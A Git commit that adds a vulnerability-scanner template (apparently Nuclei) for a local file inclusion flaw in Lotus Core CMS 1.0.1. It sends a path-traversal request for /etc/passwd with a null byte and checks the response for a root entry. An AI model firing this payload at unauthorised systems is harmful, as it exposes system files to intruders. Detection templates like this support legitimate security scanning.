Create lotus-core-cms-lfi.yaml

patch-1
Roberto Nunes 2021-10-10 21:19:56 +09:00 committed by GitHub
parent 55678cff0c
commit 3291ec2fe9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

24
lotus-core-cms-lfi.yaml Normal file
View File

@ -0,0 +1,24 @@
id: lotus-core-cms-lfi
info:
name: Lotus Core CMS 1.0.1 - Local File Inclusion
author: 0x_Akoko
severity: high
tags: lfi
reference: https://cxsecurity.com/issue/WLB-2020010234
requests:
- method: GET
path:
- '{{BaseURL}}/index.php?page_slug=../../../../../etc/passwd%00'
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200